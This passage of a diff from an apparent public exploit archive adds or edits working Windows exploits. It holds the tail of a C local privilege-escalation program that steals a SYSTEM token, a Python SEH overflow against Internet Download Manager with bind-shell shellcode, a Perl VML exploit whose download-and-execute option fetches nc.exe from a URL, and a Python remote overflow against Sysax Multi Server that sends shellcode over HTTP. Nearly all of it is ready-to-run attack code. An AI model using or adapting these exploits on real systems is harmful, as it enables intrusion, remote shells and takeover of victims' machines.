      PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService);
 HANDLE GetSystemToken(HANDLE hThread)
 {
  SuspendThread(hThread);
  NtImpersonateThread* fNtImpersonateThread = 
     (NtImpersonateThread*)GetProcAddress(GetModuleHandle(L"ntdll"), 
                                          "NtImpersonateThread");
  SECURITY_QUALITY_OF_SERVICE sqos = {};
  sqos.Length = sizeof(sqos);
  sqos.ImpersonationLevel = SecurityImpersonation;
  SetThreadToken(&hThread, nullptr);
  NTSTATUS status = fNtImpersonateThread(hThread, hThread, &sqos);
  if (status != 0)
  {
    ResumeThread(hThread);
    printf("Error impersonating thread %08X\n", status);
    exit(1);
  }
  HANDLE hToken;
  if (!OpenThreadToken(hThread, TOKEN_DUPLICATE | TOKEN_IMPERSONATE, 
                       FALSE, &hToken))
  {
    printf("Error opening thread token: %d\n", GetLastError());
    ResumeThread(hThread);    
    exit(1);
  }
  ResumeThread(hThread);
  return hToken;
 }
 struct ThreadArg
 {
  HANDLE hThread;
  HANDLE hToken;
 };
 DWORD CALLBACK SetTokenThread(LPVOID lpArg)
 {
  ThreadArg* arg = (ThreadArg*)lpArg;
  while (true)
  {
    if (!SetThreadToken(&arg->hThread, arg->hToken))
    {
      printf("Error setting token: %d\n", GetLastError());
      break;
    }
  }
  return 0;
 }
 int main()
 {
  std::map<DWORD, HANDLE> thread_handles;
  printf("Gathering thread handles\n");
  for (int i = 0; i < MAX_PROCESSES; ++i) {
    HANDLE hThread = GetThreadHandle();
    DWORD dwTid = GetThreadId(hThread);
    if (!dwTid)
    {
      printf("Handle not a thread: %d\n", GetLastError());
      exit(1);
    }
    if (thread_handles.find(dwTid) == thread_handles.end())
    {
      thread_handles[dwTid] = hThread;
    }
    else
    {
      CloseHandle(hThread);
    }
  }
  printf("Done, got %zd handles\n", thread_handles.size());
  if (thread_handles.size() > 0)
  {
    HANDLE hToken = GetSystemToken(thread_handles.begin()->second);
    printf("System Token: %p\n", hToken);
    for (const auto& pair : thread_handles)
    {
      ThreadArg* arg = new ThreadArg;
      arg->hThread = pair.second;
      DuplicateToken(hToken, SecurityImpersonation, &arg->hToken);
      CreateThread(nullptr, 0, SetTokenThread, arg, 0, nullptr);
    }
    while (true)
    {
      PROCESS_INFORMATION procInfo = {};
      STARTUPINFO startInfo = {};
      startInfo.cb = sizeof(startInfo);     
      if (CreateProcessWithLogonW(L"test", L"test", L"test", 
              LOGON_NETCREDENTIALS_ONLY, nullptr, 
              L"cmd.exe", CREATE_SUSPENDED, nullptr, nullptr, 
              &startInfo, &procInfo))
      {
        HANDLE hProcessToken;
        // If we can't get process token good chance it's a system process.
        if (!OpenProcessToken(procInfo.hProcess, MAXIMUM_ALLOWED, 
                              &hProcessToken))
        {
          printf("Couldn't open process token %d\n", GetLastError());
          ResumeThread(procInfo.hThread);
          break;
        }
        // Just to be sure let's check the process token isn't elevated.
        TOKEN_ELEVATION elevation;
        DWORD dwSize = 0;
        if (!GetTokenInformation(hProcessToken, TokenElevation, 
                              &elevation, sizeof(elevation), &dwSize))
        {
          printf("Couldn't get token elevation: %d\n", GetLastError());
          ResumeThread(procInfo.hThread);
          break;
        }
        if (elevation.TokenIsElevated)
        {
          printf("Created elevated process\n");
          break;
        }
        TerminateProcess(procInfo.hProcess, 1);
        CloseHandle(procInfo.hProcess);
        CloseHandle(procInfo.hThread);
      }     
    }
  }
  return 0;
 }
--- a/platforms/windows/local/39579.py
+++ b/platforms/windows/local/39579.py
@ -0,0 +1,94 @@
 #!/usr/bin/python
 # Exploit Title: Internet Download Manager 6.25 Build 14 - 'Find file' SEH Buffer Overflow (Unicode)
 # Date: 20-3-2016
 # Exploit Author: Rakan Alotaibi
 # Contact: https://twitter.com/hxteam
 # Software Link: http://mirror2.internetdownloadmanager.com/idman625build14.exe
 # Tested on: Windows 7 SP1 x86
 # How to exploit: IDM > Downloads > Find > paste exploit string into 'Find file' textbox
 tag = "AvAv"
 # msfvenom -p windows/shell_bind_tcp lport=4444 -e x86/unicode_upper BufferRegister=EAX
 shellcode = (
 "PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ"
 "11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J"
 "BKL9XU2M0KPM0QP3YZENQ7PQTTKR0NPDKR2LLDKQBN44KSBMXLO7GOZO601KO6LO"
 "LS1SLM2NLMP7Q8OLMKQY7IRZR1BQG4K22N04K0JOLDK0LN1SHJC0HM18Q0Q4K0YO"
 "0KQ9CTKOYLX9SNZQ94KNTDKKQ8V01KOVLGQ8OLMKQY708K0D5KFLC3MKHOKCMNDD"
 "5ZD0X4KB8O4M1IC2F4KLL0KTKPXMLKQICDKKTDKKQJ0SY0DO4NDQK1KS1QIPZ21K"
 "OK01O1O1JDKMBZKTM1M2HP3OBKPKP1XT7SCNR1OB42H0LCGO6LGKOIEH860M1M0K"
 "PMYXD1DPPQXMY3PBKKPKOHU2JKXR9R0IRKMQ0R0Q00PQXJJLO9OIPKOIE4WQXM2K"
 "PN11L4IYVQZLPQFPWS8XBIKNW1WKOHU0WRHWG9YOHKOKO8U27BHD4ZLOKYQKOYE0"
 "W671X2UBNPMS1KOYEBH2C2MRDM0TIIS27QG0WP1ZVBJLR29PVK2KM3697PDNDOLK"
 "QM1TM14NDLPWVKP14QD0PQF26PVOV26PNQFR6QC26QXBYXLOO3VKO9E3YK00NB6O"
 "VKOP0QXKX57MMC0KOZ5WKL0FUFBB6QX5V5E7MEMKOXUOLKV3LKZ3PKKIP45M57KP"
 "GMCCB2OBJKPQCKO9EAA")
 # Windows NtAccessCheckAndAuditAlarm EggHunter
 # Size: 32 bytes
 egghunter = (
 "PPYAIAIAIAIAQATA"
 "XAZAPA3QADAZABAR"
 "ALAYAIAQAIAQAPA5"
 "AAAPAZ1AI1AIAIAJ"
 "11AIAIAXA58AAPAZ"
 "ABABQI1AIQIAIQI1"
 "111AIAJQI1AYAZBA"
 "BABABAB30APB944J"
 "BQV51HJKOLOPBR2Q"
 "ZKRPXXMNNOLKUPZ2"
 "TJOWHKPOQKPT6DKJ"
 "ZVOT5ZJVOBUK7KOK"
 "7LJA")
 buffersize = 6000
 nseh = "\x61\x47" # popad + venetian pad
 seh =  "\x8d\x51" # 0x0051008d: pop edi # pop esi # ret [IDMan.exe]
 venalign = (
            "\x47" # venetian pad
            "\x55" # push ebp
            "\x47" # venetian pad
            "\x58" # pop eax
            "\x47" # venetian pad
            "\x05\x18\x11" # add eax,11001800
            "\x47" # venetian pad
            "\x2d\x17\x11" # sub eax,11001700
            "\x47" # venetian pad
            "\x50" # push eax
            "\x47" # venetian pad
            "\xc3" # ret
            )
 venalign2 = (
            "\x43" # venetian pad
            "\x47" # inc edi
            "\x43" # venetian pad
            "\x57" # push edi
            "\x43" # venetian pad
            "\x58" # pop eax
            "\x43" # venetian pad
            "\x05\x18\x11" # add eax,11001800
            "\x43" # venetian pad
            "\x2d\x17\x11" # sub eax,11001700
            "\x43" # venetian pad
            "\x50" # push eax
            "\x43" # venetian pad
            "\xc3" # ret
            )
 junk2 = "\x71" * 108
 junk3 = "\x71" * 110
 evil2 = tag +  venalign2 + junk3 + shellcode
 junk = "\x42" * (2192-(len(evil2)))
 evil =  junk + evil2 + nseh + seh + venalign + junk2 + egghunter
 fill = "\x47" * (buffersize-len(evil))
 buffer = evil + fill
 filename = "exploit.txt"
 file = open(filename, 'w')
 file.write(buffer)
 file.close()
 print buffer
 print "[+] File created successfully"
--- a/platforms/windows/remote/3148.pl
+++ b/platforms/windows/remote/3148.pl
@ -5,7 +5,7 @@
 $html = "laz.html";
 print "(c) pang0 // www.tcbilisim.org\nbug found3d by LifeAsaGeek\nMS07-004 VML integer overflow exploit\nusage: perl $0 <shell> <opt>\n",
 "shell => -b bind(31337)\n-d down.exec if selc. -d u must a down addr. \n",
-"exam: perl $0 -b\nexam2: perl $0 -d http://blah.com/nc.exe\n" and exit if !$ARGV[0];
+"exam: perl $0 -b\nexam2: perl $0 -d http://server/nc.exe\n" and exit if !$ARGV[0];
 #down exec
 $down =
 "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03".
@ -47,7 +47,7 @@ $bind =
 "\x82\x2b\x26\xbb\xcd\x18\x25\xee\x5b\x83\x0a\x50\xf9\xf6\xde\x67".
 "\x5a\x83\x0c\xc7\xd9\x7c\xda\x38";
 if ($ARGV[0] eq '-d'){
-$shlaz = $down;$url = $ARGV[1];$url = "http://pang0.by.ru/wget/nc.exe";
+$shlaz = $down;$url = $ARGV[1];$url = "http://server/nc.exe";
 print "u must start http:// or ftp://\n" and exit if !($url =~ /http|ftp/);
 }
 $shlaz = $bind if $ARGV[0] eq '-b';
--- a/platforms/windows/remote/39585.py
+++ b/platforms/windows/remote/39585.py
@ -0,0 +1,91 @@
 # Exploit Title: Sysax Multi Server 6.50 HTTP File Share SEH Overflow RCE Exploit
 # Date: 03/21/2016
 # Exploit Author: Paul Purcell
 # Contact: ptpxploit at gmail
 # Vendor Homepage: http://www.sysax.com/
 # Vulnerable Version Download: http://download.cnet.com/Sysax-Multi-Server/3000-2160_4-76171493.html (6.50 as of posting date)
 # Version: Sysax Multi Server 6.50
 # Tested on: Windows XP SP3 English
 # Category: Remote Code Execution
 #
 # Timeline: 03/11/16 Bug found
 #           03/14/16 Vender notified
 #           03/17/16 Vender acknowledges issue and publishes patch (6.51)
 #           03/21/16 Exploit Published
 #
 # Summary:  This is a post authentication exploit that requires the HTTP file sharing service to be running on
 #           Sysas Multi Server 6.50. The SID can be retrieved from your browser's URL bar after logging into the
 #           service. Once exploited, the shellcode runs with SYSTEM privileges.  In this example, we attack folder_
 #           in dltslctd_name1.htm.  The root path of the user shouldn't break the buffer offset in the stack, though
 #           the user will need to have permission to delete folders.  If the user has file delete permissions, file_
 #           will work as well.  mk_folder1_name1 is also vulnerable with a modified buffer, so this same exploit can
 #           be modified to adapt to a users permissions.
 import httplib
 target = 'webbackup'
 port = 80
 sid = '57e546cb7204b60f0111523409e49bdb16692ab5'            #retrieved from browser URL after login
 #example: http://hostname/scgi?sid=57e546cb7204b60f0111523409e49bdb16692ab5&pid=dltslctd_name1.htm
 #msfvenom -p windows/shell_bind_tcp LPORT=4444 --platform windows -a x86 -f c -b "\x00\x0a"
 shell=("\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd7\xae"
 "\x73\xe9\x83\xeb\xfc\xe2\xf4\x2b\x46\xf1\xe9\xd7\xae\x13\x60"
 "\x32\x9f\xb3\x8d\x5c\xfe\x43\x62\x85\xa2\xf8\xbb\xc3\x25\x01"
 "\xc1\xd8\x19\x39\xcf\xe6\x51\xdf\xd5\xb6\xd2\x71\xc5\xf7\x6f"
 "\xbc\xe4\xd6\x69\x91\x1b\x85\xf9\xf8\xbb\xc7\x25\x39\xd5\x5c"
 "\xe2\x62\x91\x34\xe6\x72\x38\x86\x25\x2a\xc9\xd6\x7d\xf8\xa0"
 "\xcf\x4d\x49\xa0\x5c\x9a\xf8\xe8\x01\x9f\x8c\x45\x16\x61\x7e"
 "\xe8\x10\x96\x93\x9c\x21\xad\x0e\x11\xec\xd3\x57\x9c\x33\xf6"
 "\xf8\xb1\xf3\xaf\xa0\x8f\x5c\xa2\x38\x62\x8f\xb2\x72\x3a\x5c"
 "\xaa\xf8\xe8\x07\x27\x37\xcd\xf3\xf5\x28\x88\x8e\xf4\x22\x16"
 "\x37\xf1\x2c\xb3\x5c\xbc\x98\x64\x8a\xc6\x40\xdb\xd7\xae\x1b"
 "\x9e\xa4\x9c\x2c\xbd\xbf\xe2\x04\xcf\xd0\x51\xa6\x51\x47\xaf"
 "\x73\xe9\xfe\x6a\x27\xb9\xbf\x87\xf3\x82\xd7\x51\xa6\x83\xdf"
 "\xf7\x23\x0b\x2a\xee\x23\xa9\x87\xc6\x99\xe6\x08\x4e\x8c\x3c"
 "\x40\xc6\x71\xe9\xc6\xf2\xfa\x0f\xbd\xbe\x25\xbe\xbf\x6c\xa8"
 "\xde\xb0\x51\xa6\xbe\xbf\x19\x9a\xd1\x28\x51\xa6\xbe\xbf\xda"
 "\x9f\xd2\x36\x51\xa6\xbe\x40\xc6\x06\x87\x9a\xcf\x8c\x3c\xbf"
 "\xcd\x1e\x8d\xd7\x27\x90\xbe\x80\xf9\x42\x1f\xbd\xbc\x2a\xbf"
 "\x35\x53\x15\x2e\x93\x8a\x4f\xe8\xd6\x23\x37\xcd\xc7\x68\x73"
 "\xad\x83\xfe\x25\xbf\x81\xe8\x25\xa7\x81\xf8\x20\xbf\xbf\xd7"
 "\xbf\xd6\x51\x51\xa6\x60\x37\xe0\x25\xaf\x28\x9e\x1b\xe1\x50"
 "\xb3\x13\x16\x02\x15\x83\x5c\x75\xf8\x1b\x4f\x42\x13\xee\x16"
 "\x02\x92\x75\x95\xdd\x2e\x88\x09\xa2\xab\xc8\xae\xc4\xdc\x1c"
 "\x83\xd7\xfd\x8c\x3c")
 arg="folder_"                       #can also be changed to file_ if user has file delete permissions
 pid="dltslctd_name1"                #Can be changed, though padding will needed to be updated as well 
 junk1="A"*26400                     #Initial pile of junk
 noppad="\x90"*296                   #Place to land from our long jump and before our shellcode
 junkfill="\x90"*(768-len(shell))    #Fill in after our shellcode till nseh    
 nseh="\xeb\x06\x90\x90"             #Short jump over SEH
 seh="\xd7\x2a\x92\x5d"              #pop esi # pop edi # ret RPCNS4.dll
 jump="\xe9\x13\xfc\xff\xff"         #jump back 1000 bytes for plenty of room for your shellcode
 junk2="D"*9500                      #Junk at the end
 buff=(arg+junk1+noppad+shell+junkfill+nseh+seh+jump+junk2)
 head = "Host: Wee! \r\n"
 head += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\r\n"
 head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
 head += "Accept-Language: en-us,en;q=0.5\r\n"
 head += "Accept-Encoding: gzip, deflate\r\n"
 head += "Referer: http://gotcha/scgi?sid="+sid+"&pid="+pid+".htm\r\n"
 head += "Proxy-Connection: keep-alive\r\n"
 head += "Content-Type: multipart/form-data; boundary=---------------------------20908311357425\r\n"
 head += "Content-Length: 1337\r\n"
 head += "If-Modified-Since: *\r\n"
 head += "\r\n"
 head += "-----------------------------217830224120\r\n"
 head += "\r\n"
 head += "\r\n"
 head += "\r\n"
 head += buff
 conn = httplib.HTTPConnection(target,port)
 conn.request("POST", "/scgi?sid="+sid+"&pid="+pid+".htm", head)